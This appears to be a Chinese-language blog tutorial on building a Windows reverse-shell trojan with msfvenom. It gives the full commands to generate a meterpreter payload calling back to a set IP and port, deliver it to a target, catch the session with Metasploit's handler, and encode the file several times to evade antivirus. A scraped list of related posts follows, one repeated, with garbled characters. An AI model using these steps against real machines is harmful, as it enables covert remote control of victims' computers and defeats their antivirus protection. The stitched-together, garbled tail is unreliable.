當我們需要往目標機上傳木馬檔案時,我們就可以利用msfvenom生成乙個木馬檔案,並用metersploit進行監聽,就能夠**回shell。
我們製作的木馬檔案有沒有免殺功能,可以在virscan中進行掃瞄檢測一下。
或者在本地用一些防毒軟體進行檢測。
1. 生成windows木馬程式。
生成乙個windows的木馬應用程式:back.exe,並**shell至192.168.91.132:8836埠。我們可以利用metersploit進行監聽
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.91.132 lport=8836 -f exe -o back.exe-p 是payload,就是控制目標主機以後,要讓他幹什麼。具體的命令就是payload.
-f 是生成的後門的格式。
-o 是輸出檔名
2. 將木馬程式傳送給目標機。
3. 在自己的kali中開啟metersploit。
msfconsole4. 目標機點選了back.exe。use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.91.132 #這裡的ip位址就是我們木馬檔案中要**的ip位址
set lport 8836
run
當目標機執行了木馬程式時,我們msf這邊就上線了,一般這種的會被防毒軟體發現,要想不被發現,就要製作免殺木馬程式。
msfvenom -l encoders #檢視有哪些編碼格式。-e x86/shikata_ga_nai 對木馬編碼進行免殺
-i 5 指定編碼5次,這個次數可以隨便修改。
-b '\x00' 指定一些壞位元組。
msfvenom木馬生成
kali winxp 生成木馬檔案 msfvenom p windows meterpreter reverse tcp lhost ip lport 4444 f exe a.exe 開啟msfconsole,等待檔案執行彈回shell use exploit multi hander set p...
利用msfvenom生成木馬程式
一,目的 熟悉msfvenom生成木馬程式過程,並執行和監聽控制.二,工具 msf 三,原理 msfvenom是msfpayload,msfencode的結合體,它的優點是單一,命令列,和效率.利用msfvenom生成木馬程式,並在目標機上執行,在本地監聽上線 四,過程 1,檢視幫助 命令 root...
利用msfvenom生成木馬程式
一,目的 熟悉msfvenom生成木馬程式過程,並執行和監聽控制.二,工具 msf 三,原理 msfvenom是msfpayload,msfencode的結合體,它的優點是單一,命令列,和效率.利用msfvenom生成木馬程式,並在目標機上執行,在本地監聽上線 四,過程 1,檢視幫助 命令 root...